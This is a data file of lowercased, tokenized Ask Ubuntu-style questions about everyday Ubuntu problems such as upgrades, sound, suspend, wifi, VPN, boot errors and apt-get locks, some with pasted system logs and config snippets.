506659	update 12.04 lts to 14.04 on dual boot laptop with win7 already installed	have 12.04 lts on laptop with win7 as a dual boot install . want to upgrade it to latest lts version 14.04 . so what is the best process , upgrade or do a clean install ? upgrade will be long path but should not affect current app ; ications , thunderbird libre office clean install will require thunderbird to be configured for all mail boxes . if clean instal how does one handle the partitions ? will 1404 install recognise existing 12.04/win7 partitions or will i have to re-image win7 onto laptop as well ?
506660	no sound notification in kde plasma desktop	i installed the kde plasma desktop yesterday on my ubuntu 14.04 system . the environment has been working quite well up until now . however , i just noticed that there was no sound notification icon in the panel . although the sound seems to be working , it 's very faint . even after adjusting the volume from system settings- > notifications- > player settings and increasing it to 100 % the sound remains faint . how do i restore the notification area sound indicator and fix the volume problem ? p.s . this problem is only on the kde environment . sound is working just fine on gnome .
506665	how do you get a full digital clock on the ubuntu desktop ?	how to get a clock like this on ubuntu 's desktop ?
506667	genymotion emulator screen flickers while using x.org x server ( amd/ati display driver wrapper )	i have been facing this weird situation in ubuntu 14.04 ( 64bit ) while using genymotion emulator . i have always used x.org x server opensource driver for daily use . the driver is working fine , except the genymotion emulator screen flickers ( when trying to access the android notification panel ) . i contacted the genymotion support . they mentioned that this situation may be due to the graphics card ( mine is ati radeon hd 54xx ) .i switched to amd proprietary drivers , the problem with android notification panel seems to be gone . the problem with this is the laptop boots with low resolution boot ( till the login appears ) . i have currently switched back to x.org driver as this problem is not that huge . but i would love to have it solved .
506668	vmware 6 not installing fully in ubuntu 14.04 lts	how does one go about getting vmware 6 to install completely in ubuntu 14.04 lts ? i thought i did , but it keeps telling me i need to compile modules but then crashes when i ask it to do so . ( this is my second try at asking this question . i would dearly appreciate a reply that is helpful . )
506669	an application launched from script has no icon	i use an application ( simplify3d for example ) which is a binary launched by bash script . the gui is created by the binary , while the .desktop file points to the script . for this reason i do have an icon on the desktop launcher and in the lens , but do not have an icon in the unity launcher - just a grey box with a question mark . how can i make the icon visible in the launcher too ? the .desktop file contents is [ desktop entry ] type=application version=0.9.4 name=simplify3d comment=simplify3d software icon=/opt/simplify3d/icon.png exec=/opt/simplify3d/launchscript.sh terminal=false path=/opt/simplify3d startupwmclass=simplify3d // that line fixed it
506670	how to do i convert an webm ( video ) to a ( animated ) gif on the command line ?	i suppose ffmpeg is the weapon of choice but i did n't find out how to reach my goal .
506671	progress bar popup in kubuntu 14.04	i 'm running kubuntu 14.04 which works fine , but if the screen is left for a few minutes then any mouse movement or key press causes the progress bar to pop up . the progress bar disappears after a few seconds , but it is distracting . the popup has an icon at the left which looks like a small blue screen , and then the bar itself , followed by a percentage , which seems to be random . does anyone know what is causing it , what it means , and how i can stop it happening ? link to image of progress bar
506673	usb mouse not working after unplug-plug in 14.04	my nox `` krom kull '' mouse will not work ( except for the lights ) in my laptop when i unplug it and then plug it again in `` ubuntu 14.04 '' . i have tried with an old `` razer '' mouse and that one does work . i also kind of remember this not being a problem a month or two ago , so this could be related to a recent ubuntu update . and , due to a recent mechanical issue with this mouse , i have been given a new one of the same model that also does not work . the model and an os update seem to be the best candidate as the source of the problem . the laptop is an `` alienware m17r4 '' . thanks !
506677	deja-dup restore failed	i 've already read this and this . i even tried to mess around with gpg to change the pass phrase . i was unsuccessful , so i ca n't manually restore . i am running a clean install of trusty tahr , and i am trying to restore my backups from my previous version of ubuntu . when i try to restore from deja-dup i get this error : http : //picpaste.com/error-x1lhcwhk.png i must have read a dozen threads discussing this issue , and any solution i try is unsuccessful . so far i am disappointed overall with ubuntu . i have had nothing but problems since i first installed it some weeks ago . please help me restore my files , i have some important code i am working on there .
506678	is it safe to upgrade my kernel ?	i 'm currently running version 14.04 . is it safe to upgrade only kernel to the recently released 3.16 ?
506691	no sound on skype	i use skype for ubuntu , but there is a problem : i can not send and receive sound . when i open the skype 's options window in the sound and microphone devices it says that in all i use a `` virtual device '' . i think this is where the problem is , so , could you please help me ? also , i do not use the original ubuntu , i use lubuntu .
506692	suspend does not work	so i have a fairly new ( two weeks old ) ubuntu installation ( 14.04 x64 ) and it looks like suspend mode does not work ... when i click system - > suspend the screen goes black for about one seccond and then everything comes back to normal , and my wifi is reconnecting . no error message ever comes either . i tried it on another laptop ( an old netbook x86 , acer ) and it worked as expected on that one , even automatically suspended when i closed the lid . any tips for solvig this really annoying problem ? i am still used to just closing the lid when i leave my computer for a few hours as i was using windows since recently , but now when i come back i 'm finding my battery almost drained .
506697	how to do a full clone of a vm ?	environment : host machine : ubuntu 12.04 lts guest machine : ubuntu 12.04 lts virtualization system : virtualbox last version . how can i perform a full clone of my vm ?
506699	use/see whole the flash memory space	when we bought a n giga byte flash memory , the free space that the os provide for us , is less than n gigabytes . for example , for a 2 gb flash memory , total space that we can use , is 1.86 gb . as far as i know , the difference is for metadata and filesystems . is that right ? my question : is there any command or program in linux , to see or use whole the 2gb space ? can i see those metadata and filesystems ? appreciate your time and consideration .
506701	apt-get update says `` reading package lists ... done '' and then ends the process	i reinstalled ubuntu14.04 in my laptop ( 32 bit ) since i could n't update the system , unfortunately the problem persists . basically when i type sudo apt-get update , the system search for the sources and after getting them it just says : `` reading package lists ... done '' and then ends the process . i used to see different messages like `` building tree information '' and then `` reading state information '' but now nothing similar appears on the screen and the system is not updated since typing again `` sudo apt-get update '' gives the same result ( i was expecting a message like `` the system is already updated '' ) . please help !
506703	copy data held by www-data over ssh	i have an apache server ( machine # 1 ) holding a database which i want to rsync distantly ( the server is actually owncloud , for those who know ) . my data is maintained by the server and its rights are rwx -- -- -- www-data : www-data or so . now i have another distant machine ( machine # 2 ) which i would like to use in order to backup the first machine 's database . machine # 2 will run rsync over ssh and via a cron job . i am not sure which account to use in order to log to machine # 1 via ssh . i understand the only 2 accounts which can read/copy the database on machine # 1 are www-data and root . as i can not login as www-data ( this is a system account and i do not know the password ) , does that mean i need to login as root via ssh ? is that possible ? is that safe ? another way would be to create another account , add it to the www-data group and give the www-data group read rights . unfortunately this is not possible as it is the server ( owncloud ) and not me which gives the access rights to the database , and the rights given do not allow the www-data group to read the files ( at least not on all files ) : see rwx -- -- -- i am not sure how to get the accounts and rights organized so as to be able to rsync distantly . any idea ? thanks , antoine .
506705	riak on ubuntu vmware player http : //127.0.0.1:8098 does not work	i configured unbuntu 14 on vmware player on win 7 . then i installed riak on it as per the instructions on basho . i did not change any of the defaults . when i try http : // 127.0.0.1:10018 on the vm , i can see the contents . however , when i try the default port http : // 127.0.0.1:8098 it does not work . i get a `` unable to connect '' `` firefox ca n't establish a connection to the server at 127.0.0 . 1:8098 '' . i tried `` telnet 127.0.0.1 8098 '' and get `` unable to connect to remote host : connection refused '' . can someone please advise ? i am new to linux and riak . so any help is appreciated .
506707	start screen ubuntu 14.04 /mnt/sdc1	i had problems with start screen on ubuntu 14.04 , the message is below ubuntu log before start gnome . > ( the disk unity to /mnt/sdc1 is not yeat ready or non mounted or present ) and below is writed : press ) s ) to scape or ( m ) to recovery manually ! ! ! ! how can i solve it ? thanaks a lot and sorry about the bad english : )
506710	run xfce4 desktop from terminal	i 'm using ubuntu 14.04 . after update i 've got unity frozen . upper panel was all-gray , buttons on side panel did n't respond . tried to repair , but no luck . re enable unity plugin and some other in compiz and another tricks did n't help . so unity and supplementary soft has been removed and purged . and i 'm stuck with terminal . have installed xfce4 . could not install xubuntu-desktop because of dependances and that 's ok. x-server looks like working ( possible to start vlc with xinit ) . result of ctrl+alt+f7 - black screen . laptop boots to terminal . so the question is how to get xfce desktop working .
506711	wifi problems with ubuntu 12.04	i have the wifi connected to my laptop as of now but if i switch off the wifi/modem and then later switch it on again my laptop using ubuntu 12.04 does n't detect it . the laptop only detects the wifi again after i do a sys restart for the modem by connecting my laptop to the modem through a wired connection and restarting the wifi from the modem configuration dashboard provided by the provider . can someone help me with this please ?
506713	troubleshooting excessively long boot time in ubuntu 12.04 ?	i have a new installation that takes forever and more to boot . i searched and found this very useful post ubuntu taking very long time to boot to pinpoint the cause of the slow booting . finally i get a lot of entries running dmesg -d > dmesg.log and the following very lengthy entries in that log : [ 3.405771 < 0.039144 > ] ipv6 : addrconf ( netdev_up ) : eth4 : link is not ready [ 3.572064 < 0.166293 > ] vboxpci : iommu not found ( not registered ) [ 5.785044 < 2.212980 > ] e1000e : eth4 nic link is up 1000 mbps full duplex , flow control : none [ 5.786114 < 0.001070 > ] ipv6 : addrconf ( netdev_change ) : eth4 : link becomes ready [ 9.990221 < 4.204107 > ] mei 0000:00:16.0 : init hw failure . [ 122.866442 < 112.876221 > ] init : udevtrigger post-stop process ( 897 ) terminated with status 1 [ 122.874905 < 0.008463 > ] vesafb : mode is 2560x1440x32 , linelength=10240 , pages=0 [ 122.874910 < 0.000005 > ] vesafb : scrolling : redraw [ 122.874914 < 0.000004 > ] vesafb : truecolor : size=8:8:8:8 , shift=24:16:8:0 [ 123.116207 < 0.241293 > ] vesafb : framebuffer at 0xb1000000 , mapped to 0xffffc90018c00000 , using 14400k , total 14400k [ 123.116660 < 0.000453 > ] console : switching to colour frame buffer device 320x90 [ 123.116752 < 0.000092 > ] fb0 : vesa vga frame buffer device [ 123.132560 < 0.015808 > ] init : plymouth-splash main process ( 2545 ) terminated with status 1 [ 123.267453 < 0.134893 > ] nvidia 0000:03:00.0 : irq 132 for msi/msi-x [ 124.521657 < 1.254204 > ] nvrm : your system is not currently configured to drive a vga console [ 124.521662 < 0.000005 > ] nvrm : on the primary vga device . the nvidia linux graphics driver [ 124.521663 < 0.000001 > ] nvrm : requires the use of a text-mode vga console . use of other console [ 124.521664 < 0.000001 > ] nvrm : drivers including , but not limited to , vesafb , may result in [ 124.521665 < 0.000001 > ] nvrm : corruption and stability problems , and is not supported . [ 124.697152 < 0.175487 > ] nvidia 0000:83:00.0 : irq 133 for msi/msi-x [ 241.061897 < 116.364745 > ] info : task kworker/0:1:227 blocked for more than 120 seconds . [ 241.061904 < 0.000007 > ] `` echo 0 > /proc/sys/kernel/hung_task_timeout_secs '' disables this message . [ 241.061907 < 0.000003 > ] kworker/0:1 d 0000000000000000 0 227 2 0x00000000 [ 241.061914 < 0.000007 > ] ffff88088fd23b20 0000000000000046 ffff88088fd23ad0 ffffffff81e0ebfc [ 241.061924 < 0.000010 > ] ffff88088fd23fd8 ffff88088fd23fd8 ffff88088fd23fd8 00000000000139c0 [ 241.061931 < 0.000007 > ] ffff880894114530 ffff88088fd1ae20 ffff88088fd23b00 7fffffffffffffff [ 241.061940 < 0.000009 > ] call trace : [ 241.061962 < 0.000022 > ] [ < ffffffff8169eff9 > ] schedule+0x29/0x70 [ 241.061969 < 0.000007 > ] [ < ffffffff8169d715 > ] schedule_timeout+0x2a5/0x320 [ 241.061980 < 0.000011 > ] [ < ffffffff81686cfa > ] ? printk_emit+0x31/0x33 [ 241.061986 < 0.000006 > ] [ < ffffffff8169ee4f > ] wait_for_common+0xdf/0x180 [ 241.061996 < 0.000010 > ] [ < ffffffff8108a8b0 > ] ? try_to_wake_up+0x200/0x200 [ 241.062001 < 0.000005 > ] [ < ffffffff8169efcd > ] wait_for_completion+0x1d/0x20 [ 241.062012 < 0.000011 > ] [ < ffffffff81071453 > ] flush_workqueue+0x143/0x400 [ 241.062035 < 0.000023 > ] [ < ffffffff81071725 > ] flush_scheduled_work+0x15/0x20 [ 241.062048 < 0.000013 > ] [ < ffffffffa007471c > ] mei_probe+0x288/0x2fd [ mei ] [ 241.062059 < 0.000011 > ] [ < ffffffff81362f9c > ] local_pci_probe+0x5c/0xd0 [ 241.062065 < 0.000006 > ] [ < ffffffff8106f5c8 > ] work_for_cpu_fn+0x18/0x30 [ 241.062070 < 0.000005 > ] [ < ffffffff81071cb7 > ] process_one_work+0x127/0x470 [ 241.062077 < 0.000007 > ] [ < ffffffff8107202c > ] process_scheduled_works+0x2c/0x40 [ 241.062083 < 0.000006 > ] [ < ffffffff8107304e > ] worker_thread+0x29e/0x370 [ 241.062089 < 0.000006 > ] [ < ffffffff81072db0 > ] ? manage_workers.isra.30+0x130/0x130 [ 241.062097 < 0.000008 > ] [ < ffffffff81077ed3 > ] kthread+0x93/0xa0 [ 241.062106 < 0.000009 > ] [ < ffffffff816a9aa4 > ] kernel_thread_helper+0x4/0x10 [ 241.062112 < 0.000006 > ] [ < ffffffff81077e40 > ] ? flush_kthread_worker+0xb0/0xb0 [ 241.062117 < 0.000005 > ] [ < ffffffff816a9aa0 > ] ? gs_change+0x13/0x13 [ 241.062163 < 0.000046 > ] info : task modprobe:1118 blocked for more than 120 seconds . [ 241.062165 < 0.000002 > ] `` echo 0 > /proc/sys/kernel/hung_task_timeout_secs '' disables this message . [ 241.062167 < 0.000002 > ] modprobe d ffffffff8180cc20 0 1118 986 0x00000004 [ 241.062172 < 0.000005 > ] ffff88088907dad8 0000000000000086 ffff88109f2b39c0 ffff8810bfffbd00 [ 241.062179 < 0.000007 > ] ffff88088907dfd8 ffff88088907dfd8 ffff88088907dfd8 00000000000139c0 [ 241.062187 < 0.000008 > ] ffff880893cc1710 ffff88088f6bdc40 ffff88088907db18 7fffffffffffffff [ 241.062195 < 0.000008 > ] call trace : [ 241.062201 < 0.000006 > ] [ < ffffffff8169eff9 > ] schedule+0x29/0x70 [ 241.062206 < 0.000005 > ] [ < ffffffff8169d715 > ] schedule_timeout+0x2a5/0x320 [ 241.062216 < 0.000010 > ] [ < ffffffff81040ae9 > ] ? default_spin_lock_flags+0x9/0x10 [ 241.062221 < 0.000005 > ] [ < ffffffff8108a840 > ] ? try_to_wake_up+0x190/0x200 [ 241.062226 < 0.000005 > ] [ < ffffffff8169ee4f > ] wait_for_common+0xdf/0x180 [ 241.062231 < 0.000005 > ] [ < ffffffff8108a917 > ] ? wake_up_process+0x27/0x50 [ 241.062236 < 0.000005 > ] [ < ffffffff8108a8b0 > ] ? try_to_wake_up+0x200/0x200 [ 241.062243 < 0.000007 > ] [ < ffffffff8169efcd > ] wait_for_completion+0x1d/0x20 [ 241.062248 < 0.000005 > ] [ < ffffffff8107287e > ] flush_work+0x2e/0x40 [ 241.062254 < 0.000006 > ] [ < ffffffff8106f910 > ] ? wake_up_worker+0x30/0x30 [ 241.062259 < 0.000005 > ] [ < ffffffff810728eb > ] work_on_cpu+0x5b/0x70 [ 241.062266 < 0.000007 > ] [ < ffffffff8106f5b0 > ] ? move_linked_works+0x90/0x90 [ 241.062272 < 0.000006 > ] [ < ffffffff81362f40 > ] ? pci_device_shutdown+0x80/0x80 [ 241.062279 < 0.000007 > ] [ < ffffffff813648ff > ] __pci_device_probe+0xaf/0x100 [ 241.062288 < 0.000009 > ] [ < ffffffff8136498a > ] pci_device_probe+0x3a/0x60 [ 241.062298 < 0.000010 > ] [ < ffffffff8142bd38 > ] really_probe+0x68/0x200 [ 241.062304 < 0.000006 > ] [ < ffffffff8142c035 > ] driver_probe_device+0x45/0x70 [ 241.062310 < 0.000006 > ] [ < ffffffff8142c10b > ] __driver_attach+0xab/0xb0 and so the question what are those slow entries and how can i fix them ?
506714	ubuntu 14.04 hangs / freezes frequently	when i 'm doing something on the desktop like using firefox and i want to minimize it and also using terminal and i want to minimize it , ubuntu 14.04 lts will just randomly freeze . the screen just stops , i ca n't see my mouse move , etc . however , i can alt+ctrl+f2 into a tty terminal ( though it 's not much use ) . however , sometimes through tty terminal i was able to restart but most times it was not possible . most times i needed to force shutdown through power button . what is going on here ? how can i fix / stop / prevent this ? note : my laptop has an nvidia-geforce setup . i searched similar problems in the forum and i tried so many solutions but not one solved the problem . from the forum it seems the nvidia driver is the issue but in my case it is not getting solved . note : i am using gnome desktop environment . also when i do not do anything long time and ubuntu lock automatically . after that if i give pass and want to log in it also gets hang .
506718	ubuntu 14.04 lts wakeup issue from suspended state	i 'm new in using ubuntu and i like it very much so far . unfortunately i have discovered an issue with waking up from suspended state . i was prompted to type a password but no launcher bar or any other buttons/bars/icons came to the screen . it acted as frozen here is output part from /var/log/syslog ( hope it is complete ) aug 4 14:26:53 palike-celsius-h270 gnome-session [ 27312 ] : gdk-warning : gnome-session : fatal io error 11 ( resource temporarily unavailable ) on x server :0. # 012 aug 4 14:26:53 palike-celsius-h270 networkmanager [ 819 ] : < warn > error requesting auth for org.freedesktop.networkmanager.enable-disable-network : ( 3 ) gdbus.error : org.freedesktop.dbus.error.namehasnoowner : gdbus.error : org.freedesktop.dbus.error.namehasnoowner : could not get uid of name ':1.235 ' : no such name aug 4 14:26:53 palike-celsius-h270 networkmanager [ 819 ] : < warn > error requesting auth for org.freedesktop.networkmanager.sleep-wake : ( 3 ) gdbus.error : org.freedesktop.dbus.error.namehasnoowner : gdbus.error : org.freedesktop.dbus.error.namehasnoowner : could not get uid of name ':1.235 ' : no such name aug 4 14:26:53 palike-celsius-h270 networkmanager [ 819 ] : < warn > error requesting auth for org.freedesktop.networkmanager.enable-disable-wifi : ( 3 ) gdbus.error : org.freedesktop.dbus.error.namehasnoowner : gdbus.error : org.freedesktop.dbus.error.namehasnoowner : could not get uid of name ':1.235 ' : no such name aug 4 14:26:53 palike-celsius-h270 networkmanager [ 819 ] : < warn > error requesting auth for org.freedesktop.networkmanager.enable-disable-wwan : ( 3 ) gdbus.error : org.freedesktop.dbus.error.namehasnoowner : gdbus.error : org.freedesktop.dbus.error.namehasnoowner : could not get uid of name ':1.235 ' : no such name aug 4 14:26:53 palike-celsius-h270 networkmanager [ 819 ] : < warn > error requesting auth for org.freedesktop.networkmanager.enable-disable-wimax : ( 3 ) gdbus.error : org.freedesktop.dbus.error.namehasnoowner : gdbus.error : org.freedesktop.dbus.error.namehasnoowner : could not get uid of name ':1.235 ' : no such name aug 4 14:26:53 palike-celsius-h270 networkmanager [ 819 ] : < warn > error requesting auth for org.freedesktop.networkmanager.network-control : ( 3 ) gdbus.error : org.freedesktop.dbus.error.namehasnoowner : gdbus.error : org.freedesktop.dbus.error.namehasnoowner : could not get uid of name ':1.235 ' : no such name aug 4 14:26:53 palike-celsius-h270 networkmanager [ 819 ] : < warn > error requesting auth for org.freedesktop.networkmanager.wifi.share.protected : ( 3 ) gdbus.error : org.freedesktop.dbus.error.namehasnoowner : gdbus.error : org.freedesktop.dbus.error.namehasnoowner : could not get uid of name ':1.235 ' : no such name aug 4 14:26:53 palike-celsius-h270 networkmanager [ 819 ] : < warn > error requesting auth for org.freedesktop.networkmanager.wifi.share.open : ( 3 ) gdbus.error : org.freedesktop.dbus.error.namehasnoowner : gdbus.error : org.freedesktop.dbus.error.namehasnoowner : could not get uid of name ':1.235 ' : no such name aug 4 14:26:53 palike-celsius-h270 networkmanager [ 819 ] : < warn > error requesting auth for org.freedesktop.networkmanager.settings.modify.system : ( 3 ) gdbus.error : org.freedesktop.dbus.error.namehasnoowner : gdbus.error : org.freedesktop.dbus.error.namehasnoowner : could not get uid of name ':1.235 ' : no such name aug 4 14:26:53 palike-celsius-h270 networkmanager [ 819 ] : < warn > error requesting auth for org.freedesktop.networkmanager.settings.modify.own : ( 3 ) gdbus.error : org.freedesktop.dbus.error.namehasnoowner : gdbus.error : org.freedesktop.dbus.error.namehasnoowner : could not get uid of name ':1.235 ' : no such name aug 4 14:26:53 palike-celsius-h270 networkmanager [ 819 ] : < warn > error requesting auth for org.freedesktop.networkmanager.settings.modify.hostname : ( 3 ) gdbus.error : org.freedesktop.dbus.error.namehasnoowner : gdbus.error : org.freedesktop.dbus.error.namehasnoowner : could not get uid of name ':1.235 ' : no such name aug 4 14:26:54 palike-celsius-h270 pulseaudio [ 27883 ] : [ pulseaudio ] pid.c : daemon already running . aug 4 14:26:54 palike-celsius-h270 dbus [ 621 ] : [ system ] activating service name='org.freedesktop.systemd1 ' ( using servicehelper ) thanks for any idea .
506725	using opencv with opengl	i want to use opencv with opengl . it says the library has no gpu support because it was compiled without any . is there an opencv library compiled with opengl somewhere in the repositories ? or do i have to compile it myself ? or is there some other way of using opencv that comes with ubuntu with opengl ?
506726	unixodbc on ubuntu server 14.04 64-bit	my file odbc.ini [ testing ] driver = /usr/lib/x86_64-linux-gnu/odbc/libmyodbc.so description = testinggggg server = 192.168.1.3 port = 3306 user = root password = 123456 database = test option = 3 socket = and i get this error get errors : [ unixodbc ] [ driver manager ] ca n't open lib '/usr/lib/x86_64-linux-gnu/odbc/libmyodbc.so ' : file not found ( -146994880 ) '' file not found '' but the file exits ! ? ? ? help me ...
506728	not asked for partition when i installed ubuntu	i installed ubuntu 12.04 lts version in my computer , i had installed ubuntu successfully , but during installation it was not asking for any partition , will it be problem ? what space it will take in my hard disk , how to check , where my installed package will sit ? how to check that too ? sorry for asking two many questions , but i need to know these things , your answers will be more helpful to me
506732	have ubuntu prefer one wireless adapter over another ?	i have an integrated wireless adapter that works ok with ubuntu and a usb one that works great . when i 'm somewhere where i need the extra range and performance , i 'll get out the usb adapter . but connecting to a wifi network requires disconnecting/reconnecting until the right adapter connects . i 've tried disabling the built-in adapter in /etc/network/interfaces . this works , but its rather inconvenient to always need my usb adapter . i 'd prefer to be able to set priorities on different wireless or network interfaces . something like a list where i can say eth0 # wired wlan2 # good adapter wlan0 # meh adapter is this possible ? how would i go about doing this ?
506737	how to download the latest ubuntu repo and make it available locally in my pc offline ?	i want to install ubuntu in a pc with no internet access . i want to have a local copy of the repositories in an external hd drive . this external hd drive is formatted as ntfs and has about 1 tb of free space . how much space will i need to have a full copy of the repositories ? where and how do i download it ? how do i set it up so that when i plug in the external hd , my pc sees it as the source repository ? update : i have been reading https : //help.ubuntu.com/community/aptget/offline/repository , and i downloaded all the files inside http : //archive.ubuntu.com/ubuntu/dists/trusty/ ( binaries for architecture amd64 ) . i think i 've done something wrong , because it totals to only about 50 mb . is n't it supposed to be around 50 gb ?
506738	how to open the terminal with specific command already run ? best at unity launcher !	i know how to add a command to the unity launcher , but do n't know how to have automatically opened terminal for the command . especially needed when sudo command needs password or command result should be seen .
506741	installing rrdtool	i 'm using 12.04 and have problems while using rrdtool . rrdtool version /usr/bin/rrdtool:2 : invalid char `\x7f ' in expression /usr/bin/rrdtool:2 : invalid char `\x02 ' in expression /usr/bin/rrdtool:2 : invalid char `\x01 ' in expression /usr/bin/rrdtool:2 : invalid char `\x01 ' in expression /usr/bin/rrdtool:2 : in ` ' : uninitialized constant elf ( nameerror ) can it be a problem with ruby ? ruby -- version ruby 1.9.3p0 ( 2011-10-30 revision 33570 ) [ x86_64-linux ] thanks !
506742	xmacro without running x server ?	i need to record typing in terminal , and it works just great in x session inside of xterm with xmacro , but i need to do such macro recording without running x server , and i ca n't really find the solution just like xmacro . anyone had such issue ?
506743	pptp vpn over wifi does n't work	i 'm running ubuntu 14.04 and i am trying to set up a pptp vpn between me and a server . i am using network-manager for this . now , the vpn works perfectly when i 'm on ethernet , whereas on wifi my laptop does n't know how to reach the server ( even though ping works as exepected ) : 15:50:35 networkmanager [ 16692 ] : < info > starting vpn service 'pptp ' ... 15:50:35 networkmanager [ 16692 ] : < info > vpn service 'pptp ' started ( org.freedesktop.networkmanager.pptp ) , pid 28057 15:50:35 networkmanager [ 16692 ] : < info > vpn service 'pptp ' appeared ; activating connections 15:50:35 networkmanager [ 16692 ] : < info > vpn plugin state changed : starting ( 3 ) 15:50:40 networkmanager [ 16692 ] : < info > vpn connection 'pacage ' ( connect ) reply received . 15:50:40 pppd [ 28069 ] : plugin /usr/lib/pppd/2.4.5/nm-pptp-pppd-plugin.so loaded . 15:50:40 pppd [ 28069 ] : pppd 2.4.5 started by root , uid 0 15:50:40 pppd [ 28069 ] : using interface ppp0 15:50:40 pppd [ 28069 ] : connect : ppp0 < -- > /dev/pts/23 15:50:40 networkmanager [ 16692 ] : scplugin-ifupdown : devices added ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) 15:50:40 networkmanager [ 16692 ] : scplugin-ifupdown : device added ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) : no ifupdown configuration found . 15:50:40 networkmanager [ 16692 ] : < warn > /sys/devices/virtual/net/ppp0 : could n't determine device driver ; ignoring ... 15:50:40 pptp [ 28073 ] : nm-pptp-service-28057 log [ main : pptp.c:314 ] : the synchronous pptp option is not activated 15:50:40 pptp [ 28075 ] : nm-pptp-service-28057 warn [ open_inetsock : pptp_callmgr.c:329 ] : connect : no route to host 15:50:40 pptp [ 28075 ] : nm-pptp-service-28057 fatal [ callmgr_main : pptp_callmgr.c:127 ] : could not open control connection to x.x.x.x 15:50:40 pptp [ 28073 ] : nm-pptp-service-28057 fatal [ open_callmgr : pptp.c:487 ] : call manager exited with error 256 15:50:40 pppd [ 28069 ] : modem hangup 15:50:40 pppd [ 28069 ] : connection terminated . 15:50:40 networkmanager [ 16692 ] : scplugin-ifupdown : devices removed ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) 15:50:40 networkmanager [ 16692 ] : < warn > vpn plugin failed : 1 15:50:40 pppd [ 28069 ] : exit . what am i missing here ?
506744	why are terminal shortcuts different than the ones used elsewhere for the same task ?	i ask this out of sheer curiosity . for pasting - why was n't ctrl+v made as a shortcut - which is standard - instead of ctrl+shift+v - which is not standard ? same goes with so many other shortcuts ( which are in common with other platforms ) . for scrolling up - shift+pgup instead of pgup , as another example . since this is deliberate , of course , then i am sure there is a logical explanation for it ?
506745	headphone input missing 14.04	so i run an dual-boot alienware m14x with windows 8.1 as my main os and ubutnu 14.04 as my secondary . i love ubuntu and it 's great to take a break from windows , but one problem i 've had with 14.04 since i installed it is that i ca n't use my headphone jack at all . speakers are fine , mic port is in the input tab , but nothing for headphones . i have done constant research to find a way to fix it but i 've found nothing . i would love to use ubuntu on my laptop much more but the fact i ca n't put on a pair of headphones makes me boot up in windows more than i like .
506746	windows 7 over ubuntu without a cd drive	i am not that experienced in installing operation systems . i bought a pc that has ubuntu on it but i want to replace it with windows 7 . i have been following all the steps that were covered in this video . but the problem is that once i open the archive manager it only contains a text file saying this this disc contains a `` udf '' file system and requires an operating system that supports the iso-13346 `` udf '' file system specification . the main problem is that the laptop does not have a cd drive at all can you please give me any possible solutions or guides
506748	problem when copy files between sambashare	i 've have mounted samba share 's on ubuntu 14.04 using lib pam_mount . my file /etc/security/pam_mount.conf.xml has the content : my file /etc/samba/smb.conf has the content : [ homes ] comment = home directories browseable = no writeable = yes force create mode = 0700 force directory mode = 0700 create mask = 0700 directory mask = 0700 force user = % u [ ctic ] write list = @ sj-ctic path = /grupos/ctic/ force directory mode = 770 force group = sj-ctic force user = % u force create mode = 770 valid users = @ sj-ctic create mode = 770 directory mode = 770 when i copied a file or a folder from a computer to samba share 's using the nautilus , the permissions are n't modified . example : when i copied a file from a computer or a share , the new permissions are n't apply . copy a file of computer with permission 644 to samba share homes the permission continue 644 and not 700 as it should be . when i used gnome-terminal the permissions are changed correctly . verions : description : ubuntu 14.04.1 lts release : 14.04 nautilus : instalado : 1:3.10.1-0ubuntu9.3 libpam-mount : instalado : 2.14-1
506749	managing passwords	i 've created as administrator other account using the command sudo adduser newuser . the system asked for a unix password and i provided it , but now i want to create a sudo password for that account . i mean , i want that the user can install packages but only if he/she knows a password different to the unix password . is this possible ?
506753	upgrade went horribly wrong : libc.so.6 : version 'glibc_2.17 ' not found	file system is mounted readonly , so i boot into recovery mode to run fsck , and i get the following message : mountall : /lib/i386-linux-gnu/libc.so.6 : version 'glibc_2.17 ' not found ( required by /lib/i386-linux-gnu/libudev.so.1 ) ... so i 'm thinking , it failed to completely download a package . well , i 'll update the dpkg ... except the network is not enabled . ... so i enable the network , to get a message : failed to open lockfile ... of course , because it 's a readonly filesystem . how do i get around this catch-22 ? this is on an esxi instance , if that matters .
506759	ntlmaps gui configuration and how to close ntlmaps if it is running ?	i installed ntlmaps . immediately after the installation was done , i got a window that allowed me to configure the program . now i ca n't find how to launch this gui configuration window again . anyone knows how to launch the configuration window for ntlmaps ? moreover , how to know if ntlmaps is already running , and if it is , how do i close it ?
506761	error : attempt to read or write outside of disk 'hd0 ' and then grub rescue	i have a ratel value from system 76 , 64 bit , intel core 2 duo cpu e8600 @ 3.33 ghz x2 , 3.9 gib memory , gallium 0.4 on amd rv770 graphics , 153.2 gb hard drive , no partions , with ubuntu 14.04 . it is 5 years old . even before the install of 14.04 , i was having periodic boot up problems , so i had all data on my external hd . did the 14.04 install and it again booted up off and on - would have to do a hard shut down and cross my fingers and maybe . . . or not . and now the last two days , i ca n't boot and only get the message : error : attempt to read or write outside of disk 'hd0 ' entering rescue mode . . . grub rescue > so i have done : fresh install ( the second time ) from a disk ( had checked the disk per instructions so i saw i had files so assuming the disc is good ) ran boot repair . said problems corrected but could not boot correctly ( ie ran bus errors on screen - lots- but booted and worked good - except would n't respond to the restart or shut down buttons and i had to do a hard shutdown and then got the same error message on reboot . ) my bootinfourl is http : //paste.ubuntu.com/7947917 i have done enough reading on the forums etc to know that this can be a formidable problem . i am actually hoping that it could be something as simple as a failed hard drive , cuz i could n't follow much of what was suggested in these posts to others ! so , anyway , thanks in advance for any help and just remember to make directions as explicit as possible , without assuming i know much background . and could you please look at the bootinfo report and let me know what that means !
506762	apt-get broken ... help	i tried to install ubuntu-restricted-extras using the terminal , but a `` microsoft eula '' screen poped up and i closed the terminal ( now i know i should not have done it ) . after failing to `` click '' on the `` ok '' option of such screen . the result is that i broke apt-get ... i tried apt-get install -f and also apt-get remove -f but it did not work . jan @ jan-satellite-c855 : ~ $ apt-get install -f e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ? jan @ jan-satellite-c855 : ~ $ apt-get remove -f e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ? i read the article `` what to do when apt-get fails '' but nothing worked ... so , what should i do now ?
